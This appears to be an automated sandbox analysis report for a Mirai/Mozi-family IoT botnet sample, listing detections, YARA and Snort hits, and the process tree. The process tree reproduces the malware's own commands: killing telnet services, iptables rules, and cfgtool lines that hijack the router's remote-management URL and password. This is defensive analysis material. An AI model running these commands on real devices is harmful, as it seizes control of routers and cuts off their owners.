Play interactive tour

Edit tour

Linux Analysis Report bin.sh

Overview

General Information

Sample Name:	bin.sh
Analysis ID:	522924
MD5:	eec5c6c219535fba3a0492ea8118b397
SHA1:	292559e94f1c04b7d0c65d4a01bbbc5dc1ff6f21
SHA256:	12013662c71da69de977c04cd7021f13a70cf7bed4ca6c82acbc100464d4b0ef
Infos:

Detection

Mirai

Score:	100
Range:	0 - 100
Whitelisted:	false

Signatures

Antivirus / Scanner detection for submitted sample

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected Mirai

Multi AV Scanner detection for submitted file

Antivirus detection for dropped file

Sample tries to persist itself using System V runlevels

Opens /proc/net/* files useful for finding connected devices and routers

Sample tries to persist itself using /etc/profile

Connects to many ports of the same IP (likely port scanning)

Drops files in suspicious directories

Uses known network protocols on non-standard ports

Executes the "iptables" command to insert, remove and/or manipulate rules

Sample reads /proc/mounts (often used for finding a writable filesystem)

Terminates several processes with shell command 'killall'

Writes ELF files to disk

Yara signature match

Writes shell script files to disk

Reads system information from the proc file system

Uses the "uname" system call to query kernel version information (possible evasion)

Enumerates processes within the "proc" file system

Detected TCP or UDP traffic on non-standard ports

Sample listens on a socket

Writes HTML files containing JavaScript to disk

Sample has stripped symbol table

Executes the "iptables" command used for managing IP filtering and manipulation

Executes the "modprobe" command used for loading kernel modules

Sample tries to set the executable flag

HTTP GET or POST without a user agent

Executes commands using a shell command-line interpreter

Classification

Analysis Advice

Some HTTP requests failed (404). It is likely the sample will exhibit less behavior

Static ELF header machine description suggests that the sample might only run correctly on MIPS or ARM architectures

Static ELF header machine description suggests that the sample might not execute correctly on this machine

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	522924
Start date:	16.11.2021
Start time:	15:43:38
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 43s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	bin.sh
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 16.04 x64 (Kernel 4.4.0-116, Firefox 59.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171)
Analysis Mode:	default
Detection:	MAL
Classification:	mal100.spre.troj.evad.linSH@0/221@4/0
Warnings:	Show All Report size exceeded maximum capacity and may have missing network information. VT rate limit hit for: /opt/package/joesandbox/database/analysis/522924/sample/bin.sh

Process Tree

system is lnxubuntu1

bin.sh (PID: 6777, Parent: 6712, MD5: eec5c6c219535fba3a0492ea8118b397) Arguments: /usr/bin/qemu-arm /tmp/bin.sh

bin.sh New Fork (PID: 6790, Parent: 6777)

bin.sh New Fork (PID: 6792, Parent: 6790)

bin.sh New Fork (PID: 6794, Parent: 6792)

sh (PID: 6794, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "killall -9 telnetd utelnetd scfgmgr"

sh New Fork (PID: 6797, Parent: 6794)

killall (PID: 6797, Parent: 6794, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 telnetd utelnetd scfgmgr

bin.sh New Fork (PID: 6813, Parent: 6792)

bin.sh New Fork (PID: 6814, Parent: 6792)

bin.sh New Fork (PID: 6815, Parent: 6792)

bin.sh New Fork (PID: 6825, Parent: 6815)

sh (PID: 6825, Parent: 6815, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 47453 -j ACCEPT"

sh New Fork (PID: 6827, Parent: 6825)

iptables (PID: 6827, Parent: 6825, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --destination-port 47453 -j ACCEPT

iptables New Fork (PID: 6842, Parent: 6827)

modprobe (PID: 6842, Parent: 6827, MD5: 3d0e6fb594a9ad9c854ace3e507f86c5) Arguments: /sbin/modprobe ip_tables

bin.sh New Fork (PID: 6855, Parent: 6815)

sh (PID: 6855, Parent: 6815, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 47453 -j ACCEPT"

sh New Fork (PID: 6857, Parent: 6855)

iptables (PID: 6857, Parent: 6855, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --source-port 47453 -j ACCEPT

bin.sh New Fork (PID: 6858, Parent: 6815)

sh (PID: 6858, Parent: 6815, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --destination-port 47453 -j ACCEPT"

sh New Fork (PID: 6863, Parent: 6858)

iptables (PID: 6863, Parent: 6858, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I PREROUTING -t nat -p tcp --destination-port 47453 -j ACCEPT

bin.sh New Fork (PID: 6893, Parent: 6815)

sh (PID: 6893, Parent: 6815, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --source-port 47453 -j ACCEPT"

sh New Fork (PID: 6897, Parent: 6893)

iptables (PID: 6897, Parent: 6893, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I POSTROUTING -t nat -p tcp --source-port 47453 -j ACCEPT

bin.sh New Fork (PID: 6904, Parent: 6815)

sh (PID: 6904, Parent: 6815, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 47453 -j ACCEPT"

sh New Fork (PID: 6913, Parent: 6904)

iptables (PID: 6913, Parent: 6904, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --dport 47453 -j ACCEPT

bin.sh New Fork (PID: 6932, Parent: 6815)

sh (PID: 6932, Parent: 6815, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 47453 -j ACCEPT"

sh New Fork (PID: 6935, Parent: 6932)

iptables (PID: 6935, Parent: 6932, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --sport 47453 -j ACCEPT

bin.sh New Fork (PID: 6940, Parent: 6815)

sh (PID: 6940, Parent: 6815, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --dport 47453 -j ACCEPT"

sh New Fork (PID: 6948, Parent: 6940)

iptables (PID: 6948, Parent: 6940, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I PREROUTING -t nat -p tcp --dport 47453 -j ACCEPT

bin.sh New Fork (PID: 6967, Parent: 6815)

sh (PID: 6967, Parent: 6815, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --sport 47453 -j ACCEPT"

sh New Fork (PID: 6973, Parent: 6967)

iptables (PID: 6973, Parent: 6967, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I POSTROUTING -t nat -p tcp --sport 47453 -j ACCEPT

bin.sh New Fork (PID: 6819, Parent: 6792)

bin.sh New Fork (PID: 6821, Parent: 6792)

bin.sh New Fork (PID: 6823, Parent: 6792)

bin.sh New Fork (PID: 6990, Parent: 6792)

sh (PID: 6990, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 58000 -j DROP"

sh New Fork (PID: 6992, Parent: 6990)

iptables (PID: 6992, Parent: 6990, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --destination-port 58000 -j DROP

bin.sh New Fork (PID: 6993, Parent: 6792)

sh (PID: 6993, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 58000 -j DROP"

sh New Fork (PID: 6995, Parent: 6993)

iptables (PID: 6995, Parent: 6993, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --source-port 58000 -j DROP

bin.sh New Fork (PID: 6996, Parent: 6792)

sh (PID: 6996, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 58000 -j DROP"

sh New Fork (PID: 6998, Parent: 6996)

iptables (PID: 6998, Parent: 6996, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --dport 58000 -j DROP

bin.sh New Fork (PID: 7002, Parent: 6792)

sh (PID: 7002, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 58000 -j DROP"

sh New Fork (PID: 7010, Parent: 7002)

iptables (PID: 7010, Parent: 7002, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --sport 58000 -j DROP

bin.sh New Fork (PID: 7031, Parent: 6792)

sh (PID: 7031, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL \"http://127.0.0.1\""

bin.sh New Fork (PID: 7047, Parent: 6792)

sh (PID: 7047, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword \"acsMozi\""

bin.sh New Fork (PID: 7060, Parent: 6792)

sh (PID: 7060, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 35000 -j DROP"

sh New Fork (PID: 7067, Parent: 7060)

iptables (PID: 7067, Parent: 7060, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --destination-port 35000 -j DROP

bin.sh New Fork (PID: 7087, Parent: 6792)

sh (PID: 7087, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 50023 -j DROP"

sh New Fork (PID: 7093, Parent: 7087)

iptables (PID: 7093, Parent: 7087, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --destination-port 50023 -j DROP

bin.sh New Fork (PID: 7114, Parent: 6792)

sh (PID: 7114, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 50023 -j DROP"

sh New Fork (PID: 7122, Parent: 7114)

iptables (PID: 7122, Parent: 7114, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --source-port 50023 -j DROP

bin.sh New Fork (PID: 7140, Parent: 6792)

sh (PID: 7140, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 35000 -j DROP"

sh New Fork (PID: 7145, Parent: 7140)

iptables (PID: 7145, Parent: 7140, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --source-port 35000 -j DROP

bin.sh New Fork (PID: 7158, Parent: 6792)

sh (PID: 7158, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 7547 -j DROP"

sh New Fork (PID: 7163, Parent: 7158)

iptables (PID: 7163, Parent: 7158, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --destination-port 7547 -j DROP

bin.sh New Fork (PID: 7171, Parent: 6792)

sh (PID: 7171, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 7547 -j DROP"

sh New Fork (PID: 7179, Parent: 7171)

iptables (PID: 7179, Parent: 7171, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --source-port 7547 -j DROP

bin.sh New Fork (PID: 7194, Parent: 6792)

sh (PID: 7194, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 35000 -j DROP"

sh New Fork (PID: 7200, Parent: 7194)

iptables (PID: 7200, Parent: 7194, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --dport 35000 -j DROP

bin.sh New Fork (PID: 7209, Parent: 6792)

sh (PID: 7209, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 50023 -j DROP"

sh New Fork (PID: 7216, Parent: 7209)

iptables (PID: 7216, Parent: 7209, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --dport 50023 -j DROP

bin.sh New Fork (PID: 7224, Parent: 6792)

sh (PID: 7224, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 50023 -j DROP"

sh New Fork (PID: 7230, Parent: 7224)

iptables (PID: 7230, Parent: 7224, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --sport 50023 -j DROP

bin.sh New Fork (PID: 7241, Parent: 6792)

sh (PID: 7241, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 35000 -j DROP"

sh New Fork (PID: 7248, Parent: 7241)

iptables (PID: 7248, Parent: 7241, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --sport 35000 -j DROP

bin.sh New Fork (PID: 7255, Parent: 6792)

sh (PID: 7255, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 7547 -j DROP"

sh New Fork (PID: 7261, Parent: 7255)

iptables (PID: 7261, Parent: 7255, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --dport 7547 -j DROP

bin.sh New Fork (PID: 7280, Parent: 6792)

sh (PID: 7280, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 7547 -j DROP"

sh New Fork (PID: 7290, Parent: 7280)

iptables (PID: 7290, Parent: 7280, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --sport 7547 -j DROP

bin.sh New Fork (PID: 7314, Parent: 6792)

sh (PID: 7314, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p udp --destination-port 4000 -j ACCEPT"

sh New Fork (PID: 7316, Parent: 7314)

iptables (PID: 7316, Parent: 7314, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p udp --destination-port 4000 -j ACCEPT

bin.sh New Fork (PID: 7317, Parent: 6792)

sh (PID: 7317, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p udp --source-port 4000 -j ACCEPT"

sh New Fork (PID: 7319, Parent: 7317)

iptables (PID: 7319, Parent: 7317, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p udp --source-port 4000 -j ACCEPT

bin.sh New Fork (PID: 7321, Parent: 6792)

sh (PID: 7321, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --destination-port 4000 -j ACCEPT"

sh New Fork (PID: 7327, Parent: 7321)

iptables (PID: 7327, Parent: 7321, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I PREROUTING -t nat -p udp --destination-port 4000 -j ACCEPT

bin.sh New Fork (PID: 7344, Parent: 6792)

sh (PID: 7344, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --source-port 4000 -j ACCEPT"

sh New Fork (PID: 7351, Parent: 7344)

iptables (PID: 7351, Parent: 7344, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I POSTROUTING -t nat -p udp --source-port 4000 -j ACCEPT

bin.sh New Fork (PID: 7369, Parent: 6792)

sh (PID: 7369, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p udp --dport 4000 -j ACCEPT"

sh New Fork (PID: 7378, Parent: 7369)

iptables (PID: 7378, Parent: 7369, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p udp --dport 4000 -j ACCEPT

bin.sh New Fork (PID: 7395, Parent: 6792)

sh (PID: 7395, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p udp --sport 4000 -j ACCEPT"

sh New Fork (PID: 7405, Parent: 7395)

iptables (PID: 7405, Parent: 7395, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p udp --sport 4000 -j ACCEPT

bin.sh New Fork (PID: 7420, Parent: 6792)

sh (PID: 7420, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --dport 4000 -j ACCEPT"

sh New Fork (PID: 7426, Parent: 7420)

iptables (PID: 7426, Parent: 7420, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I PREROUTING -t nat -p udp --dport 4000 -j ACCEPT

bin.sh New Fork (PID: 7432, Parent: 6792)

sh (PID: 7432, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --sport 4000 -j ACCEPT"

sh New Fork (PID: 7439, Parent: 7432)

iptables (PID: 7439, Parent: 7432, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I POSTROUTING -t nat -p udp --sport 4000 -j ACCEPT

upstart New Fork (PID: 7470, Parent: 3310)

sh (PID: 7470, Parent: 3310, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9

sh New Fork (PID: 7471, Parent: 7470)

date (PID: 7471, Parent: 7470, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date

sh New Fork (PID: 7472, Parent: 7470)

apport-checkreports (PID: 7472, Parent: 7470, MD5: 1a7d84ebc34df04e55ca3723541f48c9) Arguments: /usr/bin/python3 /usr/share/apport/apport-checkreports --system

upstart New Fork (PID: 7497, Parent: 3310)

sh (PID: 7497, Parent: 3310, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9

sh New Fork (PID: 7498, Parent: 7497)

date (PID: 7498, Parent: 7497, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date

sh New Fork (PID: 7504, Parent: 7497)

apport-gtk (PID: 7504, Parent: 7497, MD5: ec58a49a30ef6a29406a204f28cc7d87) Arguments: /usr/bin/python3 /usr/share/apport/apport-gtk

upstart New Fork (PID: 7524, Parent: 3310)

sh (PID: 7524, Parent: 3310, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9

sh New Fork (PID: 7525, Parent: 7524)

date (PID: 7525, Parent: 7524, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date

sh New Fork (PID: 7526, Parent: 7524)

apport-gtk (PID: 7526, Parent: 7524, MD5: ec58a49a30ef6a29406a204f28cc7d87) Arguments: /usr/bin/python3 /usr/share/apport/apport-gtk

cleanup

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
bin.sh	SUSP_XORed_Mozilla	Detects suspicious XORed keyword - Mozilla/5.0	Florian Roth	0x37450:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x374c0:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x37530:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x375a0:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x37610:$xo1: oMXKNNC\x0D\x17\x0C\x12
bin.sh	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
bin.sh	JoeSecurity_Mirai_9	Yara detected Mirai	Joe Security
bin.sh	JoeSecurity_Mirai_6	Yara detected Mirai	Joe Security
bin.sh	JoeSecurity_Mirai_4	Yara detected Mirai	Joe Security

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Mirai_12	Yara detected Mirai	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
/usr/networks	SUSP_XORed_Mozilla	Detects suspicious XORed keyword - Mozilla/5.0	Florian Roth	0x37450:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x374c0:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x37530:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x375a0:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x37610:$xo1: oMXKNNC\x0D\x17\x0C\x12
/usr/networks	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
/usr/networks	JoeSecurity_Mirai_9	Yara detected Mirai	Joe Security
/usr/networks	JoeSecurity_Mirai_6	Yara detected Mirai	Joe Security
/usr/networks	JoeSecurity_Mirai_4	Yara detected Mirai	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
6777.1.00007f1ad31f9000.00007f1ad3203000.rw-.sdmp	JoeSecurity_Mirai_4	Yara detected Mirai	Joe Security
6821.1.00007f1ad31f9000.00007f1ad3203000.rw-.sdmp	JoeSecurity_Mirai_4	Yara detected Mirai	Joe Security
6790.1.00007f1ad31f9000.00007f1ad3203000.rw-.sdmp	JoeSecurity_Mirai_4	Yara detected Mirai	Joe Security
6777.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmp	SUSP_XORed_Mozilla	Detects suspicious XORed keyword - Mozilla/5.0	Florian Roth	0x37450:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x374c0:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x37530:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x375a0:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x37610:$xo1: oMXKNNC\x0D\x17\x0C\x12
6777.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmp	JoeSecurity_Mirai_5	Yara detected Mirai	Joe Security
6777.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
6777.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmp	JoeSecurity_Mirai_9	Yara detected Mirai	Joe Security
6821.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmp	SUSP_XORed_Mozilla	Detects suspicious XORed keyword - Mozilla/5.0	Florian Roth	0x37450:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x374c0:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x37530:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x375a0:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x37610:$xo1: oMXKNNC\x0D\x17\x0C\x12
6821.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmp	JoeSecurity_Mirai_5	Yara detected Mirai	Joe Security
6821.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
6821.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmp	JoeSecurity_Mirai_9	Yara detected Mirai	Joe Security
6790.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmp	SUSP_XORed_Mozilla	Detects suspicious XORed keyword - Mozilla/5.0	Florian Roth	0x37450:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x374c0:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x37530:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x375a0:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x37610:$xo1: oMXKNNC\x0D\x17\x0C\x12
6790.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmp	JoeSecurity_Mirai_5	Yara detected Mirai	Joe Security
6790.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
6790.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmp	JoeSecurity_Mirai_9	Yara detected Mirai	Joe Security
Process Memory Space: bin.sh PID: 6777	JoeSecurity_Mirai_6	Yara detected Mirai	Joe Security
Process Memory Space: bin.sh PID: 6777	JoeSecurity_Mirai_4	Yara detected Mirai	Joe Security
Click to see the 12 entries

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus / Scanner detection for submitted sample

Show sources

Source: bin.sh

Avira: detected

Multi AV Scanner detection for submitted file

Show sources

Source: bin.sh	Metadefender: Detection: 54%			Perma Link
Source: bin.sh	ReversingLabs: Detection: 75%

Antivirus detection for dropped file

Show sources

Source: /usr/networks

Avira: detection malicious, Label: LINUX/Mirai.lldau

Spreading:

Opens /proc/net/* files useful for finding connected devices and routers

Show sources

Source: /tmp/bin.sh (PID: 6815)	Opens: /proc/net/route			Jump to behavior
Source: /tmp/bin.sh (PID: 6815)	Opens: /proc/net/route			Jump to behavior

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:57282 -> 221.128.175.114:80
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 123.0.249.125:23 -> 192.168.2.20:55784
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 123.0.249.125:23 -> 192.168.2.20:55784
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 123.0.249.125:23 -> 192.168.2.20:55824
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 123.0.249.125:23 -> 192.168.2.20:55824
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 123.0.249.125:23 -> 192.168.2.20:56102
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 123.0.249.125:23 -> 192.168.2.20:56102
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 123.0.249.125:23 -> 192.168.2.20:56382
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 123.0.249.125:23 -> 192.168.2.20:56382
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:45982 -> 70.38.30.153:80
Source: Traffic	Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:45982 -> 70.38.30.153:80
Source: Traffic	Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:33058 -> 104.103.72.220:80
Source: Traffic	Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:33058 -> 104.103.72.220:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.103.72.220:80 -> 192.168.2.20:33058
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:60718 -> 3.113.149.148:80
Source: Traffic	Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:38508 -> 52.54.104.1:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:60718 -> 3.113.149.148:80
Source: Traffic	Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:36526 -> 15.164.228.23:80
Source: Traffic	Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:36526 -> 15.164.228.23:80
Source: Traffic	Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:51860 -> 66.180.167.13:80
Source: Traffic	Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:51860 -> 66.180.167.13:80
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:33706 -> 104.69.40.99:80
Source: Traffic	Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:33706 -> 104.69.40.99:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.69.40.99:80 -> 192.168.2.20:33706
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:38172 -> 122.201.116.141:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:38172 -> 122.201.116.141:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:40608 -> 201.49.41.72:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:40608 -> 201.49.41.72:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:36730 -> 216.180.103.7:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:36730 -> 216.180.103.7:80
Source: Traffic	Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:40506 -> 139.59.180.200:80
